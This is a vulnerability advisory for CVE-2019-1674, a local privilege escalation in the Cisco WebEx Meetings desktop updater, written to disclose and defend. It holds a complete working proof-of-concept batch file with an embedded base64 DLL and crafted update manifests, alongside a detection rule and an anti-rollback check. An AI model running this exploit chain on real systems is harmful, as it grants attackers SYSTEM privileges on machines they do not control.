Cisco WebEx Meetings local privilege escalation vulnerability analysis (CVE-2019-1674)
Overview
Cisco WebEx Meetings is a video conferencing and online meeting platform that supports clear audio and video communication and makes screen sharing easy. According to Cisco's own description, the platform "helps users forget about the technology and focus on what matters most". A vulnerability in the update service of the Cisco WebEx Meetings desktop application for Windows allows a local attacker to escalate privileges.
Affected versions
· Cisco Webex Meetings Desktop App v33.6.4.15
· Cisco Webex Meetings Desktop App v33.6.5.2
· Cisco Webex Meetings Desktop App v33.7.0.694
· Cisco Webex Meetings Desktop App v33.7.1.15
· Cisco Webex Meetings Desktop App v33.7.2.24
· Cisco Webex Meetings Desktop App v33.7.3.7
· Cisco Webex Meetings Desktop App v33.8.0.779
· Cisco Webex Meetings Desktop App v33.8.1.13
· Cisco Webex Meetings Desktop App v33.8.2.7
Older versions are probably affected as well, but they were not checked.
Vulnerability details
The update service of the Cisco Webex Meetings desktop application for Windows does not properly validate the version numbers of the new files it installs. An unprivileged local attacker can exploit this by invoking the update service command with crafted arguments that point it at an attacker-controlled folder, which lets the attacker run arbitrary commands with SYSTEM privileges.
To exploit the vulnerability, the attacker first copies atgpcdec.dll into a local attacker-controlled folder, renamed as atgpcdec.7z. Next, a previous version of ptUpdate.exe is compressed into a 7z archive and placed in the controlled folder. A malicious DLL named vcruntime140.dll, compressed as vcruntime140.7z, goes into the same folder. Finally, a ptUpdate.xml file describing the "updated" binary (ptUpdate.exe) is placed in the controlled folder, so that the application treats the attacker's files as a legitimate update.
To have the update applied with elevated privileges, the attacker starts the service from the command line:
sc start webexservice WebexService 1 989898 "attacker-controlled-path"
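Detection logic for the trigger described above, as an added example that is not part of the SecureAuth advisory. It flags process-creation records in which WebexService is started with a folder argument outside the Webex install tree. The sample records are constructed to resemble Sysmon Event ID 1 fields, and the trusted install roots are an assumption taken from the paths the PoC batch file below uses.

```python
"""Detection for the CVE-2019-1674 trigger: WebexService started with an
attacker-controlled folder. Added example, not part of the advisory.
Sample records are constructed; the trusted roots are an assumption."""
import ntpath
import re
from typing import Dict, Iterable, Iterator, Optional, Tuple

# Folders the legitimate updater works from (assumption, mirrors the PoC paths).
TRUSTED_ROOTS = (
    r"c:\program files (x86)\webex\webex\applications",
    r"c:\program files\webex\webex\applications",
)

# sc start webexservice WebexService 1 989898 <path>
# The final argument is the folder the service reads ptUpdate.xml from.
TRIGGER_RE = re.compile(
    r'(?:^|[\\\s"])sc(?:\.exe)?"?\s+start\s+webexservice\s+webexservice'
    r'\s+1\s+989898\s+"?(?P<path>[^"]+?)"?\s*$',
    re.IGNORECASE,
)


def extract_update_path(command_line: str) -> Optional[str]:
    """Return the folder argument of a WebexService start command, or None."""
    m = TRIGGER_RE.search(command_line.strip())
    return m.group("path").strip() if m else None


def is_trusted_folder(path: str) -> bool:
    """Prefix check after normalisation, so '..' segments cannot walk out of
    the install tree; a separator (or exact match) must follow the root so
    that a sibling such as 'Applications2' does not pass."""
    norm = ntpath.normpath(path).lower().rstrip("\\")
    return any(norm == r or norm.startswith(r + "\\") for r in TRUSTED_ROOTS)


def is_suspicious(command_line: str) -> bool:
    """True when the update service is pointed at a folder outside the
    install tree: the exploitation pattern the advisory describes."""
    path = extract_update_path(command_line)
    return path is not None and not is_trusted_folder(path)


def scan(records: Iterable[Dict[str, str]]) -> Iterator[Tuple[Dict[str, str], str]]:
    """Yield (record, update_path) for every matching process-creation record."""
    for rec in records:
        path = extract_update_path(rec.get("CommandLine", ""))
        if path is not None and not is_trusted_folder(path):
            yield rec, path


# Constructed sample records (not real telemetry).
SAMPLE_RECORDS = [
    {"User": "CORP\\jdoe", "Image": r"C:\Windows\System32\sc.exe",
     "CommandLine": r"sc start webexservice WebexService 1 989898 C:\Users\jdoe\Desktop\poc"},
    {"User": "NT AUTHORITY\\SYSTEM", "Image": r"C:\Windows\System32\sc.exe",
     "CommandLine": r'"C:\Windows\System32\sc.exe" start webexservice WebexService 1 989898 '
                    r'"C:\Program Files (x86)\Webex\Webex\Applications"'},
    {"User": "CORP\\jdoe", "Image": r"C:\Windows\System32\sc.exe",
     "CommandLine": r"sc query webexservice"},
    # Traversal out of the install tree must still be caught.
    {"User": "CORP\\jdoe", "Image": r"C:\Windows\System32\sc.exe",
     "CommandLine": r'sc start webexservice WebexService 1 989898 '
                    r'"C:\Program Files (x86)\Webex\Webex\Applications\..\..\..\..\Users\jdoe\poc"'},
]

if __name__ == "__main__":
    for rec, path in scan(SAMPLE_RECORDS):
        print(f"ALERT user={rec['User']} update_path={path}")
```

The allowlist is the weakest part of this rule: 8.3 short names (PROGRA~2), UNC paths and mapped drives can all name the same folder and would slip past a string prefix check, so on a fleet it is safer to alert on every `sc start webexservice ... 989898` issued from an interactive user session and treat the path comparison as enrichment.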
Proof of concept
The proof of concept below performs a two-stage attack, because starting with version 33.8.x the application enforces a signature check on every downloaded binary. The first stage replaces the updater itself with an older build that does not enforce that check, and the second stage then uses that build to install the malicious DLL. The two-stage attack works against all of the vulnerable packages listed above. Note that older ptUpdate.exe executables are required: version 3307.1.1811.1500 for the first stage and version 3306.4.1811.1600 for the second. If the target version is below 33.8.x, only the second stage is actually needed.
The batch file is as follows:
/-----
@echo off
REM Contents of PoC.bat
REM
REM This batch file will exploit CVE-2019-1674
REM
REM First, it will copy the atgpcdec.dll file from the installation
REM folder to the current folder as atgpcdec.7z. Then, it will backup
REM ptUpdate.exe and vcruntime140.dll files from the installation folder
REM in the current folder, adding .bak to their names. Keep in mind that
REM those files will be replaced (especially, vcruntime140.dll) and if
REM not restored, will render the application useless.
REM
REM The executable ptUpdate.exe version 3307.1.1811.1500 must be
REM compressed as ptUpdate0.7z and present in the current folder.
REM The executable ptUpdate.exe version 3306.4.1811.1600 must be
REM compressed as ptUpdate1.7z and present in the current folder.
REM Both can be generated using 7zip GUI and compressing as 7z, with
REM normal compression level and LZMA compression method.
REM Another way is to compress both files using the command line app:
REM
REM 7z.exe a ptUpdate0.7z ptUpdate.exe -m0=BCJ -m1=LZMA:d=21
REM
REM ptUpdate0.xml file will be used in the first stage of the attack. It
REM will be renamed to ptUpdate.xml. Make sure to check and adjust (if
REM necessary) the "Size" and "PackagedSize" values of the xml, to the
REM ptUpdate0.7z ones. ptUpdate0.7z will be renamed to ptUpdate.7z. Then
REM the update service will be started.
REM
REM The batch will wait until the process (ptUpdate.exe) finishes
REM
REM After the first stage is completed, it will rename ptUpdate.7z
REM back to ptUpdate0.7z, and ptUpdate.xml to ptUpdate0.xml.
REM
REM Now, ptUpdate1.xml file will be used in the second stage of the
REM attack. It will be renamed to ptUpdate.xml. Also, ptUpdate1.7z will
REM be renamed to ptUpdate.7z. Remember to check and adjust (if
REM necessary) the "Size" and "PackagedSize" values of the xml, to the
REM ptUpdate1.7z ones. Our "malicious" DLL will be generated using
REM certutil.exe and named vcruntime140.7z. It's a simple dll that will
REM execute notepad.exe on load and that has the same exported functions
REM as the original. The update service will be started again.
REM
REM The batch will wait until the process (ptUpdate.exe) finishes
REM
REM Once finished, it will print that the attack is done and wait for a
REM key press. You should see a notepad.exe (2, in fact) with SYSTEM
REM user privileges running.
REM
REM After a key is pressed, the batch will finish removing atgpcdec.7z
REM and vcruntime140.7z. Also it will rename ptUpdate.7z back to
REM ptUpdate1.7z, and ptUpdate.xml to ptUpdate1.xml.

:CheckOS
IF EXIST "%PROGRAMFILES(X86)%" (GOTO 64BIT) ELSE (GOTO 32BIT)

:64BIT
copy "%PROGRAMFILES(X86)%\Webex\Webex\Applications\atgpcdec.dll" atgpcdec.7z
copy "%PROGRAMFILES(X86)%\Webex\Webex\Applications\ptUpdate.exe" ptUpdate.exe.bak
copy "%PROGRAMFILES(X86)%\Webex\Webex\Applications\vcruntime140.dll" vcruntime140.dll.bak
GOTO END

:32BIT
copy "%PROGRAMFILES%\Webex\Webex\Applications\atgpcdec.dll" atgpcdec.7z
copy "%PROGRAMFILES%\Webex\Webex\Applications\ptUpdate.exe" ptUpdate.exe.bak
copy "%PROGRAMFILES%\Webex\Webex\Applications\vcruntime140.dll" vcruntime140.dll.bak
GOTO END

:END
REM Stage 1: downgrade ptUpdate.exe to 3307.1.1811.1500
ren ptUpdate0.xml ptUpdate.xml
ren ptUpdate0.7z ptUpdate.7z
SET mypath=%~dp0
sc start webexservice WebexService 1 989898 %mypath:~0,-1%
ECHO Waiting 3 seconds until ptUpdate.exe starts
Timeout /T 3 /Nobreak

:LOOP1
tasklist | find /i "ptUpdate" >nul 2>&1
IF ERRORLEVEL 1 (
    GOTO CONTINUE1
) ELSE (
    ECHO ptUpdate.exe is still running
    Timeout /T 1 /Nobreak
    GOTO LOOP1
)

:CONTINUE1
REM Stage 2: install the malicious vcruntime140.dll plus ptUpdate.exe 3306.4.1811.1600
ren ptUpdate.xml ptUpdate0.xml
ren ptUpdate.7z ptUpdate0.7z
ren ptUpdate1.xml ptUpdate.xml
ren ptUpdate1.7z ptUpdate.7z
REM Base64 of the malicious DLL packed as vcruntime140.7z (PackagedSize 1761)
echo N3q8ryccAARIz/fVRwYAAAAAAAB6AAAAAAAAANcfWYEAJpaOcAAX9+wFu+r0/5QBL0TuTr0Jkm3dgTnz3Weoe6NfFfEa/Y28zsBB2HEdPWzlugty+IIM4hglhy/h80OeyYw5CMe7jUK77wLPQMC9wwpT+oLYVDSuOK/v2WNuOLCpU3qtGSO+2sIFpGixpKQvLykpGOZUMczuRNNr/8Ps1lApsqe0ERm7gPGyiMqJBOCOVTC85lKIa2Cmc > dll.txt
echo scrjgqKPPNmbXvscJWxmvv4NtC3mLQ1KuXYBSZXmFp8dR+ZDy5znkGG/C3w0T76c4wRCfOk+/myji9luDzO2OOwp8wgpN1QeGsA4+kaZwKYTisIvPegsI2joDsLAomIh2ToXENtcOA9/11kkJy4ColEdqlXxwSW2u45ajuNDs0aAE9nbz4AWXtv/VPfc4fn3Q+mN7FTmaDUr8dxZ5V05IafOO2qTgdSHPemTasMSqYLbzA8iaxBZimokw >> dll.txt
echo zyzr3fwZIci+Ewzq5BnNXk+lvA30xCUYdvQuMCGkxBozk9Ec0kQ/SUixz77Nc9SbJnm0Hncff3QRRlU9ciqc6cYkQ2Cm+/dWkyDgJU+sxT9VGV+WVwNK85Q6zpPWLeVRYtk9UkxKHF0aXf3l/OgfQqtz0WSR94AF+Z9AiblDy0zOreSW8PhFbu0hfAgY1pMNC5gPNJiJ3OGwT/cLEhBPusvpfcLP3V0BwXx04T+5R7d5Rw9xWExdfCzGb >> dll.txt
echo Mgyijdf5nP7fv9e5V0KO8kKrGVofstVIN8FTQSMeRGYRdv9WyuLRFWbArCL86HMo5NYEwFinlqCGqnY8hZcDMPe89q1xoNlVDmDtLC+AZqEkPKuqStllzKH7qQDg7Ahe6AMtGjaT2NptL2bSBYlkfn+1iiMt5cC/inZAoZoreSpDbGb4HRcOVce7ZKeiBAFpEzM0bEXAxnbLNO0pHm0bYCftbOkffJap3m79V+Dj4t0NPgwbhYKUqk1Hi >> dll.txt
echo /9ebVE+IIsUlFFggilCy7BmIh3MF3Gmuhr7QLK37zV72LA0/tuDXXTWP/0EJEQ3F/v1+hSj/+HMwUBFL8xsghBfOXTpmBG6cUxK2YOwXvs/ntja2a7SWwppxtWgr4n/pxEdeezoBGl1sTZ9aIwSlu1mMehS5RYoyiSKnQfgLMsIYLqjZtc2DjUdSZDutZgC91axMjIEQ8kDIBp8dbuX4MpzNYe65OrKG/u76aemvcQ/R1QAwgTopuWgqO >> dll.txt
echo tJ7LIkRv406u+Qs2d5KA9+IplFV7ZL9w1zXTDTFqATROK0IKtY2MPaP5Ia0d0UFizj0I7OZSeDtZXPohMxi01xMLyqCXIQ4vaJGVneNi1SyxAJ2hV92+5sxBCOlQ+d4w19k6iJA/siz1+V0FnIrN6csCMaW6yBnR6H+jHpm2sqXf3xyU8UkCRx09LmD1lcSB3sWdc3AnoG2ijb7lD6eBdCH2OlMWceeAfOMRm48MfYW6+AcZJm9wEQ9p8 >> dll.txt
echo irxwCQuETvGMphqzbPxFJXErhoMTxlE57+/ZLBt8F/3XAaxQnmMucvSCFMYc6Z76OCbeotPfVnPhqL+torsEaph6DFzcw3dWuFrekbLnVVFKmM/QyeZVLS18u5lY1tGRyfAUCyhPIPJvUcXFKuDYHmdT/bOnF1B/xexvtY8boRhcKiNg4JBluTMbamdoktvfWvIVGUz2m50yA0dNN06yebHietxA+IwM0zfNbqpNWJjOItsi6/27j1mE7 >> dll.txt
echo WCgPS5tetN44WkYD28Bm+LmHwz4lbPVjAIcgZBv0OtAXJsWMUtN8Bc2z9+fVSqc7pCHGCRnYDyKm8QhcV8hU4I/M4hSN+BWYn2jGJqc42lcaMzfXrySCnF4dAtIiE1HzAwmwWAqjlVkZdFiIuQ1m+pdbx2Ipji5piYRAJtykwO0H5JThzAzJGObOMCAenaKgvgtwF97iFdBZHxuSz+3DcYF6gQupm/BxNd35l6qj19sN2qixeGJ7rQapV >> dll.txt
echo DJLTM5KMPdSItBNJSLLp9fuObcufi/6MBif28vemivzaWtalocJxX/MJni8PfdLYn/rLJQXmpq4Qm7z6N7FlPLtelATkMAZZ2ofaLFeBvIKzymBqtsxQAb63b+MowQvOkGAesT5JNXhoRqzOoATB9I/O7xIZu30SZwWdW85DX2MNAeB/DgzLt/c7U9A2D5vIgAEEBgABCYZHAAcLAQACIwMBAQVdABgAAAQDAwEDAQAMmACYAAAICgGcR >> dll.txt
echo dWGAAAFARkLAAAAAAAAAAAAAAARIwB2AGMAcgB1AG4AdABpAG0AZQAxADQAMAAuAGQAbABsAAAAGQAUCgEAkBJyInaL1AEVBgEAIAAAAAAA >> dll.txt
certutil -decode dll.txt vcruntime140.7z
del dll.txt
SET mypath=%~dp0
sc start webexservice WebexService 1 989898 %mypath:~0,-1%
ECHO Waiting 3 seconds until ptUpdate.exe starts
Timeout /T 3 /Nobreak

:LOOP2
tasklist | find /i "ptUpdate" >nul 2>&1
IF ERRORLEVEL 1 (
    GOTO CONTINUE2
) ELSE (
    ECHO ptUpdate.exe is still running
    Timeout /T 1 /Nobreak
    GOTO LOOP2
)

:CONTINUE2
ECHO Attack done!
pause
ren ptUpdate.xml ptUpdate1.xml
ren ptUpdate.7z ptUpdate1.7z
del atgpcdec.7z
del vcruntime140.7z
-----/
The ptUpdate0.xml file is as follows:
/-----
<?xml version="1.0"?>
<serv:message xmlns:serv="http://www.webex.com/schemas/2002/06/service" xmlns:com="http://www.webex.com/schemas/2002/06/common" xmlns:use="http://www.webex.com/schemas/2002/06/service/user">
  <serv:header></serv:header>
  <serv:body>
    <serv:bodyContent xsi:type="use:getUpdateResponse" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
      <UpdateVersionNumber>33.8.3</UpdateVersionNumber>
      <BuildNumber>33.8.3-24</BuildNumber>
      <ExternalVersionNumber>33.8.3.24</ExternalVersionNumber>
      <GPCINI>self/gpc.php</GPCINI>
      <ReleaseDate>February 2017</ReleaseDate>
      <Description>WebEx Productivity Tools 33.8.3</Description>
      <MsiLocation>msi/ptools.msi</MsiLocation>
      <UpdateFormat>binary</UpdateFormat>
      <ReleaseTrain>T32</ReleaseTrain>
      <Location>$dummy/upgradeserver/client/ptool/33.8.3</Location>
      <ControlOption>0</ControlOption>
      <WBSVERSION>33</WBSVERSION>
      <Server>myCompany.webex.com</Server>
      <UserName>MCKSysAR@myCompany.com</UserName>
      <DownloadSize>22496333</DownloadSize>
      <VersionURL/>
      <FileInfo>
        <SectionName>Installation</SectionName>
        <PackedName>ptupdate.7z</PackedName>
        <PackedNameL10N>ptupdate.7z</PackedNameL10N>
        <OrigianlName>ptupdate.exe</OrigianlName>
        <Version>3307,1,1811,1500</Version>
        <Size>1985592</Size>
        <PackagedSize>610752</PackagedSize>
        <CheckMethod>1</CheckMethod>
        <CouldIgnore>1</CouldIgnore>
        <NeedDownLoad>1</NeedDownLoad>
      </FileInfo>
      <Tools>
        <UseEmailType/>
        <Outlook>0</Outlook>
        <Notes>0</Notes>
        <UseWebExWithOffice>1</UseWebExWithOffice>
        <Excel>0</Excel>
        <PowerPoint>0</PowerPoint>
        <Word>0</Word>
        <IEShortCut>1</IEShortCut>
        <IERightMenu>0</IERightMenu>
        <UseWebExWithIM>1</UseWebExWithIM>
        <AOL>0</AOL>
        <Sametime>0</Sametime>
        <WindowsMessenger>0</WindowsMessenger>
        <Yahoo>0</Yahoo>
        <Skype>0</Skype>
        <GoogleTalk>0</GoogleTalk>
        <Firefox/>
        <IPPhone>1</IPPhone>
      </Tools>
    </serv:bodyContent>
  </serv:body>
</serv:message>
-----/
The ptUpdate1.xml file is as follows:
/-----
<?xml version="1.0"?>
<serv:message xmlns:serv="http://www.webex.com/schemas/2002/06/service" xmlns:com="http://www.webex.com/schemas/2002/06/common" xmlns:use="http://www.webex.com/schemas/2002/06/service/user">
  <serv:header></serv:header>
  <serv:body>
    <serv:bodyContent xsi:type="use:getUpdateResponse" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
      <UpdateVersionNumber>33.8.4</UpdateVersionNumber>
      <BuildNumber>33.8.4-24</BuildNumber>
      <ExternalVersionNumber>33.8.4.24</ExternalVersionNumber>
      <GPCINI>self/gpc.php</GPCINI>
      <ReleaseDate>February 2017</ReleaseDate>
      <Description>WebEx Productivity Tools 33.8.4</Description>
      <MsiLocation>msi/ptools.msi</MsiLocation>
      <UpdateFormat>binary</UpdateFormat>
      <ReleaseTrain>T32</ReleaseTrain>
      <Location>$dummy/upgradeserver/client/ptool/33.8.4</Location>
      <ControlOption>0</ControlOption>
      <WBSVERSION>33</WBSVERSION>
      <Server>myCompany.webex.com</Server>
      <UserName>MCKSysAR@myCompany.com</UserName>
      <DownloadSize>22496333</DownloadSize>
      <VersionURL/>
      <FileInfo>
        <SectionName>Common</SectionName>
        <PackedName>vcruntime140.7z</PackedName>
        <PackedNameL10N>vcruntime140.7z</PackedNameL10N>
        <OrigianlName>vcruntime140.dll</OrigianlName>
        <Version>14,14,26405,0</Version>
        <Size>6144</Size>
        <PackagedSize>1761</PackagedSize>
        <CheckMethod>1</CheckMethod>
        <CouldIgnore>1</CouldIgnore>
        <NeedDownLoad>1</NeedDownLoad>
      </FileInfo>
      <FileInfo>
        <SectionName>Installation</SectionName>
        <PackedName>ptupdate.7z</PackedName>
        <PackedNameL10N>ptupdate.7z</PackedNameL10N>
        <OrigianlName>ptupdate.exe</OrigianlName>
        <Version>3306,4,1811,1600</Version>
        <Size>1992760</Size>
        <PackagedSize>611786</PackagedSize>
        <CheckMethod>1</CheckMethod>
        <CouldIgnore>1</CouldIgnore>
        <NeedDownLoad>1</NeedDownLoad>
      </FileInfo>
      <Tools>
        <UseEmailType/>
        <Outlook>0</Outlook>
        <Notes>0</Notes>
        <UseWebExWithOffice>1</UseWebExWithOffice>
        <Excel>0</Excel>
        <PowerPoint>0</PowerPoint>
        <Word>0</Word>
        <IEShortCut>1</IEShortCut>
        <IERightMenu>0</IERightMenu>
        <UseWebExWithIM>1</UseWebExWithIM>
        <AOL>0</AOL>
        <Sametime>0</Sametime>
        <WindowsMessenger>0</WindowsMessenger>
        <Yahoo>0</Yahoo>
        <Skype>0</Skype>
        <GoogleTalk>0</GoogleTalk>
        <Firefox/>
        <IPPhone>1</IPPhone>
      </Tools>
    </serv:bodyContent>
  </serv:body>
</serv:message>
-----/
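The version check the advisory says the update service lacks, as an added example that is not code from the advisory, from SecureAuth, or from Cisco. It parses the getUpdateResponse manifest format shown above (the `FileInfo` entries of ptUpdate.xml, with their comma-separated `Version` fields) and contrasts the flawed behaviour, installing whatever the manifest lists, with an anti-rollback check that refuses any file whose version is not strictly newer than the installed one. The installed-version inventory, the trimmed manifest and the function names are constructed for illustration.

```python
"""Anti-rollback check for the ptUpdate.xml manifest format.
Added example, not the product's own code. INSTALLED and MANIFEST are
constructed; real file versions on a 33.8.x host will differ."""
import xml.etree.ElementTree as ET
from typing import Dict, List, Tuple

Version = Tuple[int, int, int, int]

# Constructed inventory (assumption): an updater build newer than the
# 3307/3306 builds the PoC downgrades to, and the same runtime DLL version
# that the second-stage manifest advertises.
INSTALLED: Dict[str, Version] = {
    "ptupdate.exe": (3308, 2, 1901, 700),
    "vcruntime140.dll": (14, 14, 26405, 0),
}

# Trimmed copy of the second-stage manifest (ptUpdate1.xml) from the PoC.
MANIFEST = """<?xml version="1.0"?>
<serv:message xmlns:serv="http://www.webex.com/schemas/2002/06/service"
              xmlns:use="http://www.webex.com/schemas/2002/06/service/user">
  <serv:header></serv:header>
  <serv:body>
    <serv:bodyContent xsi:type="use:getUpdateResponse"
                      xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
      <ExternalVersionNumber>33.8.4.24</ExternalVersionNumber>
      <FileInfo>
        <SectionName>Common</SectionName>
        <PackedName>vcruntime140.7z</PackedName>
        <OrigianlName>vcruntime140.dll</OrigianlName>
        <Version>14,14,26405,0</Version>
        <PackagedSize>1761</PackagedSize>
        <NeedDownLoad>1</NeedDownLoad>
      </FileInfo>
      <FileInfo>
        <SectionName>Installation</SectionName>
        <PackedName>ptupdate.7z</PackedName>
        <OrigianlName>ptupdate.exe</OrigianlName>
        <Version>3306,4,1811,1600</Version>
        <PackagedSize>611786</PackagedSize>
        <NeedDownLoad>1</NeedDownLoad>
      </FileInfo>
    </serv:bodyContent>
  </serv:body>
</serv:message>
"""


def parse_version(text: str) -> Version:
    """'3306,4,1811,1600' -> (3306, 4, 1811, 1600); malformed input is an error,
    not a silently accepted zero."""
    parts = [p.strip() for p in text.split(",")]
    if len(parts) != 4 or not all(p.isdigit() for p in parts):
        raise ValueError(f"bad version field: {text!r}")
    return (int(parts[0]), int(parts[1]), int(parts[2]), int(parts[3]))


def parse_manifest(xml_text: str) -> List[Dict[str, object]]:
    """One dict per <FileInfo> entry flagged for download. FileInfo and its
    children carry no namespace, so a plain tag lookup works."""
    root = ET.fromstring(xml_text)
    entries: List[Dict[str, object]] = []
    for fi in root.iter("FileInfo"):
        if fi.findtext("NeedDownLoad", "0").strip() != "1":
            continue
        entries.append({
            "name": fi.findtext("OrigianlName", "").strip().lower(),
            "packed": fi.findtext("PackedName", "").strip(),
            "version": parse_version(fi.findtext("Version", "")),
            "packaged_size": int(fi.findtext("PackagedSize", "0")),
        })
    return entries


def fmt(v: Version) -> str:
    return ".".join(str(x) for x in v)


def vulnerable_decision(entries, installed) -> Dict[str, str]:
    """Models the flaw: every listed file is installed, whatever its version."""
    return {e["name"]: "install" for e in entries}


def hardened_decision(entries, installed) -> Dict[str, str]:
    """Anti-rollback: replace a file only when the manifest version is strictly
    newer than what is installed; refuse files that are not known components."""
    decisions: Dict[str, str] = {}
    for e in entries:
        current = installed.get(e["name"])
        if current is None:
            decisions[e["name"]] = "reject: not an installed component"
        elif e["version"] <= current:
            decisions[e["name"]] = (
                f"reject: downgrade {fmt(e['version'])} <= installed {fmt(current)}")
        else:
            decisions[e["name"]] = "install"
    return decisions


if __name__ == "__main__":
    found = parse_manifest(MANIFEST)
    print("vulnerable:", vulnerable_decision(found, INSTALLED))
    print("hardened:  ", hardened_decision(found, INSTALLED))
```

Equality is rejected on purpose: the second-stage manifest advertises the same vcruntime140.dll version that is already installed, and a check that only blocks lower versions would let that swap through. A version check is also only a complement to signature verification, not a substitute; the PoC shows why, since its first stage defeats the 33.8.x signature enforcement by downgrading the updater itself, which is exactly the case an anti-rollback rule on ptUpdate.exe closes.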
Timeline
· December 4, 2018: SecureAuth sends the initial notification to Cisco PSIRT.
· December 5, 2018: Cisco acknowledges the report and says it will analyze it.
· December 7, 2018: Cisco reports that it is working on a fix plan.
· December 7, 2018: SecureAuth thanks Cisco for the update.
· December 10, 2018: Cisco tells SecureAuth that it expects to release the fix by the end of February.
· December 10, 2018: SecureAuth thanks Cisco for the update.
· January 15, 2019: SecureAuth asks Cisco for a status update.
· January 22, 2019: SecureAuth asks Cisco for a status update again.
· January 22, 2019: Cisco replies that the fix will be released in February.
· February 11, 2019: Cisco confirms February 27 as the disclosure date.
· February 27, 2019: Advisory published.
Vendor response
Cisco states that the vulnerability is fixed in versions 33.6.6 and 33.9.1 of the Cisco Webex Meetings Desktop App. Cisco has also published the following advisory:
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190227-wmda-cmdinj
Credits
The vulnerability was discovered and researched by Marcos Accossatto of SecureAuth. Publication of this advisory was coordinated by Leandro Cuozzo of the SecureAuth Advisories Team.